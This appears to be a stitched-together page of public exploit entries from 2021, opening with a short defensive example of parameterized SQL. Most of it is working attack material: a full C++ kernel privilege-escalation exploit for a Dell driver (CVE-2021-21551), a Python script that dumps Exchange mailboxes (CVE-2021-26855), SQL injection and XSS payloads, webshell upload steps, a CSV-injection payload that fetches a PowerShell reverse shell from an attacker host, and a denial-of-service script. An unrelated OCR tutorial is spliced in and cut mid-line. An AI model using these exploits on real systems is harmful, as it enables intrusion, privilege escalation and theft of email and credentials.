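The query behind this bypass and its parameterized replacement, as an added example that is not the application's code: the PoC payload above is run against a constructed in-memory SQLite admin table, once through string-built SQL and once through a bound parameter with a constant-time hash comparison. The table layout, the SHA-256 storage and the admin credentials (taken from the COVID19 XSS post on this page) are assumptions for the example.

```python
import hashlib
import hmac
import sqlite3

# The auth-bypass string from the PoC above.
PAYLOAD = "admin' or '1'='1"


def make_db():
    """Constructed in-memory stand-in for the application's admin table.
    Passwords are stored as SHA-256 hex for the example; a real deployment
    should use a slow password hash such as bcrypt or Argon2."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES (1, 'admin', ?)",
               (hashlib.sha256(b"Test@123").hexdigest(),))
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """The pattern behind the bypass: the username is spliced into the SQL
    text. Hashing the password does not help, because the quote in the
    username closes the literal and the attacker's OR '1'='1' becomes part
    of the query itself. Returns the admin id or None."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    query = (f"SELECT id FROM admin WHERE username='{username}' "
             f"AND password='{digest}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Parameterized lookup: the driver sends the username as data, so the
    quote and the OR stay inside the value. The hash is compared in
    constant time after the row is fetched. Returns the admin id or None."""
    row = db.execute("SELECT id, password FROM admin WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return None
    digest = hashlib.sha256(password.encode()).hexdigest()
    return row[0] if hmac.compare_digest(row[1], digest) else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload :", login_vulnerable(db, PAYLOAD, PAYLOAD))  # 1
    print("safe, payload       :", login_safe(db, PAYLOAD, PAYLOAD))        # None
    print("safe, real password :", login_safe(db, "admin", "Test@123"))     # 1
```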

# Exploit Title: Acer Backup Manager Module 3.0.0.99 - 'IScheduleSvc.exe' Unquoted Service Path
# Discovery by: Emmanuel Lujan
# Discovery Date: 2021-05-19
# Vendor Homepage: https://www.acer.com/ac/en/US/content/home
# Tested Version: 3.0.0.99
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Home Premium x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

NTI IScheduleSvc    NTI IScheduleSvc    C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe    Auto

# Service info:

C:\>sc qc "NTI IScheduleSvc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: NTI IScheduleSvc
        TYPE               : 110  WIN32_OWN_PROCESS  <interactive>
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Acer Backup Manager\IScheduleSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : NTI IScheduleSvc
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)
# Date: 19/05/2021
# Exploit Author: Rohit Burke
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10

==> Stored Cross-Site Scripting XSS:
An attacker uses Stored XSS to inject malicious content (referred to as the payload), most often JavaScript code, into the target application. If there is no input validation, this malicious code is permanently stored (persisted) by the target application, for example within a database. For example, an attacker may enter a malicious script into a user input field such as a blog comment field or in a forum post. When a victim opens the affected web page in a browser, the XSS attack payload is served to the victim's browser as part of the HTML code (just like a legitimate comment would). This means that victims will end up executing the malicious script once the page is viewed in their browser.

==> Attack Vector:
This vulnerability allows an attacker to inject the XSS payload in the Admin profile section; each time the admin visits any other section of the application, the XSS triggers and the attacker can steal the cookie according to the crafted payload.

==> Vulnerable Parameters: "Admin name" parameter

==> Steps to reproduce:
1) Go to http://localhost/covid-tms/login.php and log in as an Admin (#Username: admin #Password: Test@123).
2) Click on (Admin --> Profile). Enter the payload in Admin name = <script>alert(1337)</script> and click on submit.
3) Now, whichever section of the application the admin visits, the payload gets executed successfully.

Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)

# Exploit Title: Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)
# Exploit Author: @nu11secur1ty
# Date: 05.20.2021
# Software Link: https://github.com/spotweb/spotweb
# Proof: https://streamable.com/hix5o1

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty

from selenium import webdriver
import time
import os, sys

# Vendor: https://www.nzbserver.com/

# Jump over login form :D
website_link="http://192.168.1.160/spotweb-develop/?page=login&data[htmlheaderssent]=true"

# enter your login username
username="nu11secur1ty"

# enter your login password
password="password"

#enter the element for username input field
element_for_username="loginform[username]"
#enter the element for password input field
element_for_password="loginform[password]"
#enter the element for submit button
element_for_submit="loginform[submitlogin]"

#browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for firefox users

time.sleep(3)
browser.get((website_link))

try:
    username_element = browser.find_element_by_name(element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element_by_name(element_for_password)
    password_element.send_keys(password)
    signInButton = browser.find_element_by_name(element_for_submit)
    signInButton.click()

    # Exploit Cross Site Scripting (DOM Based)
    # Payload:
    #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
    time.sleep(1)

    # Payload link "esc-rule"
    browser.get(("http://192.168.1.160/spotweb-develop#jaVasCript:/*-/*`/*\`/*'/*"'/**/(/**/oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'""))
    print("The payload is deployed DOM is BOMing you ':))'...\n")
    os.system('pause')
    browser.close()
except Exception:
    #### This exception occurs if the element are not found in the webpage.
    print("DOM...")
HireHackking
# Exploit Title: DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)
# Date: 10/05/2021
# Exploit Author: Paolo Stagno aka VoidSec
# Version: <= 2.3
# CVE: CVE-2021-21551
# Tested on: Windows 10 Pro x64 v.1903 Build 18362.30
# Blog: https://voidsec.com/reverse-engineering-and-exploiting-dell-cve-2021-21551/

#include <iostream>
#include <windows.h>
#include <winternl.h>
#include <tlhelp32.h>
#include <algorithm>

#define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA)
#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2

// define the buffer structure which will be sent to the vulnerable driver
typedef struct Exploit {
    uint64_t Field1; // "padding" can be anything
    void* Field2;    // where to write
    uint64_t Field3; // must be 0
    uint64_t Field4; // value to write
};

typedef struct outBuffer {
    uint64_t Field1;
    uint64_t Field2;
    uint64_t Field3;
    uint64_t Field4;
};

// define a pointer to the native function 'NtQuerySystemInformation'
using pNtQuerySystemInformation = NTSTATUS(WINAPI*)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength);

// define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

// define the SYSTEM_HANDLE_INFORMATION structure
typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

int main(int argc, char** argv) {
    // open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3
    HANDLE device = ::CreateFileW(
        L"\\\\.\\DBUtil_2_3",
        GENERIC_WRITE | GENERIC_READ,
        NULL,
        nullptr,
        OPEN_EXISTING,
        NULL,
        NULL);

    if (device == INVALID_HANDLE_VALUE) {
        std::cout << "[!] Couldn't open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n";

    // resolve the address of NtQuerySystemInformation and assign it to a function pointer
    pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation) {
        std::cout << "[!] Couldn't resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Resolved NtQuerySystemInformation!\n";

    // open the current process token - it will be used to retrieve its kernelspace address later
    HANDLE currentProcess = ::GetCurrentProcess();
    HANDLE currentToken = NULL;
    bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, &currentToken);
    if (!success) {
        std::cout << "[!] Couldn't open handle to the current process token. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Opened a handle to the current process token!\n";

    // allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);

    // call NtQuerySystemInformation and fill the handleTableInformation structure
    ULONG returnLength = 0;
    NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);

    uint64_t tokenAddress = 0;

    // iterate over the system's handle table and look for the handles belonging to our process
    for (int i = 0; i < handleTableInformation->NumberOfHandles; i++) {
        SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];

        // if it finds our process and the handle matches the current token handle we already opened, print it
        if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)currentToken) {
            tokenAddress = (uint64_t)handleInfo.Object;
            std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl;
        }
    }

    outBuffer buffer = { 0, 0, 0, 0 };

    /*
    dt nt!_SEP_TOKEN_PRIVILEGES
        +0x000 Present          : Uint8B
        +0x008 Enabled          : Uint8B
        +0x010 EnabledByDefault : Uint8B
    We've added +1 to the offsets to ensure that the low bytes part are 0xff.
    */

    // overwrite the _SEP_TOKEN_PRIVILEGES "Present" field in the current process token
    Exploit exploit = { 0x4141414142424242, (void*)(tokenAddress + 0x40), 0x0000000000000000, 0xffffffffffffffff };
    // overwrite the _SEP_TOKEN_PRIVILEGES "Enabled" field in the current process token
    Exploit exploit2 = { 0x4141414142424242, (void*)(tokenAddress + 0x48), 0x0000000000000000, 0xffffffffffffffff };
    // overwrite the _SEP_TOKEN_PRIVILEGES "EnabledByDefault" field in the current process token
    Exploit exploit3 = { 0x4141414142424242, (void*)(tokenAddress + 0x50), 0x0000000000000000, 0xffffffffffffffff };

    DWORD bytesReturned = 0;

    success = DeviceIoControl(
        device,
        IOCTL_CODE,
        &exploit,
        sizeof(exploit),
        &buffer,
        sizeof(buffer),
        &bytesReturned,
        nullptr);
    if (!success) {
        std::cout << "[!] Couldn't overwrite current token 'Present' field. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Successfully overwritten current token 'Present' field!\n";

    success = DeviceIoControl(
        device,
        IOCTL_CODE,
        &exploit2,
        sizeof(exploit2),
        &buffer,
        sizeof(buffer),
        &bytesReturned,
        nullptr);
    if (!success) {
        std::cout << "[!] Couldn't overwrite current token 'Enabled' field. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Successfully overwritten current token 'Enabled' field!\n";

    success = DeviceIoControl(
        device,
        IOCTL_CODE,
        &exploit3,
        sizeof(exploit3),
        &buffer,
        sizeof(buffer),
        &bytesReturned,
        nullptr);
    if (!success) {
        std::cout << "[!] Couldn't overwrite current token 'EnabledByDefault' field. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Successfully overwritten current token 'EnabledByDefault' field!\n";

    std::cout << "[+] Token privileges successfully overwritten!\n";
    std::cout << "[+] Spawning a new shell with full privileges!\n";
    system("cmd.exe");

    return 0;
}


Title: Python + Baidu OCR for image recognition

To be honest, Python is really strong at data processing. Especially today, in the age of big data, we cannot do without data of all kinds. This article introduces how to use Baidu OCR for text recognition.
Experimental Environment
Python (3.9.12)
Kali Linux
Baidu OCR
Apply for Baidu OCR
Visit Baidu Smart Cloud and activate the API
Website: https://cloud.baidu.com/campaign/OCR202203/index.html
You can log in with your Baidu account. The advantage of logging in with Baidu is that Baidu's real-name authentication carries over directly, so you do not need to wait several more days for manual review.
You can choose the free trial, or buy 10,000 calls for 1 yuan. I think there is no difference; either is enough.
When you receive the free credit, make sure to check the interface type, otherwise it will be blank.
Create a new application and get the token
Click Create App under Console - Text Recognition - Overview
Select Individual as the application type, and fill in the application name and description as you like
After creation is complete, open the application list; there you can see the API Key and Secret Key, so write them down.
Text Recognition
Following the official example, a simple Python script was written. The code is as follows:
from aip import AipOcr
APP_ID='
# Exploit Title: Billing Management System 2.0 - Union based SQL injection (Authenticated)
# Date: 2021-05-16
# Exploit Author: Mohammad Koochaki
# Vendor Homepage: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14380&title=Billing+Management+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 2.0

# This web application contains several SQL injection vulnerabilities in the following paths:
- http://localhost/editgroup.php?id=1
- http://localhost/edituser.php?id=1
- http://localhost/editcategory.php?id=10
- http://localhost/editproduct.php?id=1
- http://localhost/editsales.php?id=1

# PoC (editgroup.php):
- Vulnerable code:
$sql="SELECT * from user_groups where delete_status='0' and id='".$_GET['id']." '";

- Payload:
http://localhost/editgroup.php?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),3,4,5%20from%20users--+

# Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload
# Date: 2021-05-16
# Exploit Author: bwnz
# Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html
# Version: 1.0
# Tested on: Ubuntu 20.04.2 LTS

# Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack.
# After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload
# vulnerability to obtain remote code execution.

-----SQL Injection-----

Step 1.) Navigate to the login page and populate the email and password fields.
Step 2.) With Burp Suite running, send and capture the request.
Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap.
Step 4.) Open a terminal and run the following command: sqlmap -r <saved item>

Below are the SQLMap results

Parameter: user_email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: user_email=test@test.com' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user_email=test@test.com' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user_email=test@test.com' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button=

----- END -----

----- Authenticated RCE via Arbitrary File Upload -----

# For this attack, it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in.

Step 1.) After logging in, click the "Initialization" option and "Add System Info".
Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish".
Step 3.) By default, the file is uploaded to http://<IP>/Staff_registration/media/evil.php. Navigate to it for RCE.

----- END ------


Microsoft Exchange 2019 - Unauthenticated Email Download

# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download
# Date: 03-11-2021
# Exploit Author: Gonzalo Villegas a.k.a Cl34r
# Vendor Homepage: https://www.microsoft.com/
# Version: OWA Exchange 2013 - 2019
# Tested on: OWA 2016
# CVE : CVE-2021-26855
# Details: checking users mailboxes and automated downloads of emails

import requests
import argparse
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

__proxies__ = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}  # for debug on proxy

# needs to specify mailbox, will return folder Id if account exists
payload_get_folder_id = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
               xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <m:GetFolder>
      <m:FolderShape>
        <t:BaseShape>AllProperties</t:BaseShape>
      </m:FolderShape>
      <m:FolderIds>
        <t:DistinguishedFolderId Id="inbox">
          <t:Mailbox>
            <t:EmailAddress>{}</t:EmailAddress>
          </t:Mailbox>
        </t:DistinguishedFolderId>
      </m:FolderIds>
    </m:GetFolder>
  </soap:Body>
</soap:Envelope>
"""

# needs to specify Folder Id and ChangeKey, will return a list of messages Ids (emails)
payload_get_items_id_folder = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
               xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <m:FindItem Traversal="Shallow">
      <m:ItemShape>
        <BaseShape>AllProperties</BaseShape>
      </m:ItemShape>
      <SortOrder/>
      <m:ParentFolderIds>
        <t:FolderId Id="{}" ChangeKey="{}"/>
      </m:ParentFolderIds>
      <QueryString/>
    </m:FindItem>
  </soap:Body>
</soap:Envelope>
"""

# needs to specify Id (message Id) and ChangeKey (of message too), will return an email from mailbox
payload_get_mail = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
               xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetItem xmlns="http://schemas.microsoft.com/exchange/services/2006/messages"
             xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
             Traversal="Shallow">
      <ItemShape>
        <t:BaseShape>Default</t:BaseShape>
      </ItemShape>
      <ItemIds>
        <t:ItemId Id="{}" ChangeKey="{}"/>
      </ItemIds>
    </GetItem>
  </soap:Body>
</soap:Envelope>
"""


def getFQDN(url):
    print("[*] Getting FQDN from headers")
    rs = requests.post(url + "/owa/auth.owa", verify=False, data="evildata")
    if "X-FEServer" in rs.headers:
        return rs.headers["X-FEServer"]
    else:
        print("[-] Can't get FQDN ")
        exit(0)


def extractEmail(url, uri, user, fqdn, content_folderid, path):
    headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn),
               "Content-Type": "text/xml",
               "User-Agent": "Mozilla pwner"}
    from xml.etree import ElementTree as ET
    dom = ET.fromstring(content_folderid)
    for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'):
        id_folder = p[0].attrib.get("Id")
        change_key_folder = p[0].attrib.get("ChangeKey")
        data = payload_get_items_id_folder.format(id_folder, change_key_folder)
        random_uris = ["auth.js", "favicon.ico", "ssq.js", "ey37sj.js"]
        rs = requests.post(url + uri, data=data, headers=headers, verify=False)
        if "ErrorAccessDenied" in rs.text:
            print("[*] Denied ;(.. retrying")
            t_uri = uri.split("/")[-1]
            for ru in random_uris:
                print("[*] Retrying with {}".format(uri.replace(t_uri, ru)))
                rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)
                if "NoError" in rs.text:
                    print("[+] data found, downloading email")
                    break
        print("[+] Getting mails...")
        dom_messages = ET.fromstring(rs.text)
        messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items')
        for m in messages:
            id_message = m[0].attrib.get("Id")
            change_key_message = m[0].attrib.get("ChangeKey")
            data = payload_get_mail.format(id_message, change_key_message)
            random_uris = ["auth.js", "favicon.ico", "ssq.js", "ey37sj.js"]
            rs = requests.post(url + uri, data=data, headers=headers, verify=False)
            if "ErrorAccessDenied" in rs.text:
                print("[*] Denied ;(.. retrying")
                t_uri = uri.split("/")[-1]
                for ru in random_uris:
                    print("[*] Retrying with {}".format(uri.replace(t_uri, ru)))
                    rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)
                    if "NoError" in rs.text:
                        print("[+] data found, downloading email")
                        break
            try:
                f = open(path + "/" + user.replace("@", "_").replace(".", "_") + "_" + change_key_message.replace("/", "").replace("\\", "") + ".xml", 'w+')
                f.write(rs.text)
                f.close()
            except Exception as e:
                print("[!] Can't write .xml file to path (email): ", e)


def checkURI(url, fqdn):
    headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn),
               "Content-Type": "text/xml",
               "User-Agent": "Mozilla hehe"}
    arr_uri = ["//ecp/xxx.js", "/ecp/favicon.ico", "/ecp/auth.js"]
    for uri in arr_uri:
        rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format("thisisnotanvalidmail@pwn.local"), headers=headers)
        #print(rs.content)
        if rs.status_code == 200 and "MessageText" in rs.text:
            print("[+] Valid URI:", uri)
            calculated_domain = rs.headers["X-CalculatedBETarget"].split(".")
            if calculated_domain[-2] in ("com", "gov", "gob", "edu", "org"):
                calculated_domain = calculated_domain[-3] + "." + calculated_domain[-2] + "." + calculated_domain[-1]
            else:
                calculated_domain = calculated_domain[-2] + "." + calculated_domain[-1]
            return uri, calculated_domain
        #time.sleep(1)
    print("[-] No valid URI found ;(")
    exit(0)


def checkEmailBoxes(url, uri, user, fqdn, path):
    headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn),
               "Content-Type": "text/xml",
               "User-Agent": "Mozilla hehe"}
    rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user), headers=headers)
    #time.sleep(1)
    #print(rs.content)
    if "ResponseCode" in rs.text and "ErrorAccessDenied" in rs.text:
        print("[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable".format(user))
    if "ResponseCode" in rs.text and "NoError" in rs.text:
        print("[+] Valid Email Found!: {}".format(user))
        extractEmail(url, uri, user, fqdn, rs.text, path)
    if "ResponseCode" in rs.text and "ErrorNonExistentMailbox" in rs.text:
        print("[-] Not Valid Email: {}".format(user))


def main():
    __URL__ = None
    __FQDN__ = None
    __mailbox_domain__ = None
    __path__ = None
    print("[***** OhhWAA *****]")
    parser = argparse.ArgumentParser(usage="Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>")
    parser.add_argument('-u', "--url", help="Url, provide schema and not final / (eg https://example.org)", required=True)
    parser.add_argument('-l', "--list", help="Users mailbox list", required=True)
    parser.add_argument("-p", "--path", help="Path to write emails in xml format", required=True)
    parser.add_argument('-f', "--fqdn", help="FQDN", required=False, default=None)
    parser.add_argument("-d", "--domain", help="Domain to check mailboxes (eg if .local dont work)", required=False, default=None)
    args = parser.parse_args()
    __URL__ = args.url
    __FQDN__ = args.fqdn
    __mailbox_domain__ = args.domain
    __list_users__ = args.list
    __valid_users__ = []
    __path__ = args.path

    if not __FQDN__:
        __FQDN__ = getFQDN(__URL__)
    print("[+] Got FQDN:", __FQDN__)
    valid_uri, calculated_domain = checkURI(__URL__, __FQDN__)
    if not __mailbox_domain__:
        __mailbox_domain__ = calculated_domain
    list_users = open(__list_users__, "r")
    for user in list_users:
        checkEmailBoxes(__URL__, valid_uri, user.strip() + "@" + __mailbox_domain__, __FQDN__, __path__)
    print("[!!!] FINISHED OhhWAA")


if __name__ == '__main__':
    main()

Visual Studio Code 1.47.1 - Denial of Service (PoC)

# Exploit Title: Visual Studio Code 1.47.1 - Denial of Service (PoC)
# Exploit Author: H.H.A.Ravindu Priyankara
# Category: Denial of Service (DOS)
# Tested Version: 1.47.1
# Vendor: Microsoft
# Software Download Link: https://code.visualstudio.com/updates/

Write-Host " *-------------------------------------------------------------------------------------------------------*" -ForegroundColor Yellow
Write-Host " |" -ForegroundColor Yellow -NoNewline; Write-Host " Exploit Title :-" -ForegroundColor Green -NoNewline; Write-Host " Visual Studio Code (VS Code) Denial of Service " -ForegroundColor Cyan -NoNewline; Write-Host " |" -ForegroundColor Yellow
Write-Host " |" -ForegroundColor Yellow -NoNewline; Write-Host " Author :-" -ForegroundColor Green -NoNewline; Write-Host " H.H.A.Ravindu.Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " |" -ForegroundColor Yellow
Write-Host " |" -ForegroundColor Yellow -NoNewline; Write-Host " Github :-" -ForegroundColor Green -NoNewline; Write-Host " https://github.com/Ravindu-Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " |" -ForegroundColor Yellow
Write-Host " |" -ForegroundColor Yellow -NoNewline; Write-Host " Youtube :-" -ForegroundColor Green -NoNewline; Write-Host " https://www.youtube.com/channel/UCKD2j5Mbr15RKaXBSIXwvMQ " -ForegroundColor Cyan -NoNewline; Write-Host " |" -ForegroundColor Yellow
Write-Host " |" -ForegroundColor Yellow -NoNewline; Write-Host " Linkedin :-" -ForegroundColor Green -NoNewline; Write-Host " https://www.linkedin.com/in/ravindu-priyankara-b77753209/ " -ForegroundColor Cyan -NoNewline; Write-Host " |" -ForegroundColor Yellow
Write-Host " *-------------------------------------------------------------------------------------------------------*" -ForegroundColor Yellow

[string]$Userinpts = Read-Host -Prompt "Enter Run or Stop:-"

if ($Userinpts -eq "Run") {
    Write-Output "Yeah I Know"
    # allocate ever larger strings without bound until the host runs out of memory
    while ($True) {
        $name = "AAAAAAA"
        $name * 1000000
    }
    #or
    #$name = "AAAAAAA"
    #$name * 1000000
}

if ($Userinpts -eq "Stop") {
    exit
}

#==========================================================
#==================== solution ============================
#==========================================================
#Update Your Visual Studio Code Application
# 1.47.1 version ==> 1.56.0 version
#==========================================================

In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection

# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection
# Date: 18/05/2021
# Exploit Author: Gulab Mondal
# Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html
# Version: In4Suite ERP 3.2.74.1370
# Tested on: Windows
# CVE: CVE-2021-27828

-----------------------------------------
SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries.
--------------

# Error condition

POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1

txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" "

# SQL Injection exploitation

POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1

txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt="
------------------------------

ManageEngine ADSelfService Plus 6.1 - CSV Injection

# Exploit Title: ManageEngine ADSelfService Plus 6.1 - CSV Injection
# Date: 19/05/2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: 6.1
# Description: https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection

import requests
import sys
import urllib3

"""
Proof of Concept:

Step-1
1- The malicious user sends a POST request to the login page https://TARGET-IP/j_security_check and sets the j_username parameter as shown below.
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0

Step-2
2- The login attempt is saved to the "User Attempts Audit Report" table under the Reports > Audit Reports section.
Url: https://TARGET-IP/webclient/index.html#/reports/listReports/12
The j_username parameter value is saved to the "User Name" column, which is the start of a line in the CSV file.
If an admin user exports this table as a CSV file and confirms the alert popup, the malicious user obtains a reverse shell connection.

Details: https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection
"""


def loginReq(target, payload, csrfToken):
    s = requests.Session()
    data = {
        "j_username": payload,
        "j_password": "joker",
        "domainName": "ADSelfService+Plus+Authentication",
        "AUTHRULE_NAME": "ADAuthenticator",
        "adscsrf": csrfToken
    }
    url = "https://" + target + "/j_security_check"
    req = s.post(url, data=data, allow_redirects=False, verify=False)
    if req.status_code == 302:
        print("[+] Sending request is successful.")
        print("[+] Injected payload: %s" % payload)
    else:
        print("[-] Something went wrong!")
        print(req.status_code)


def getCsrfToken(target, payload=None):
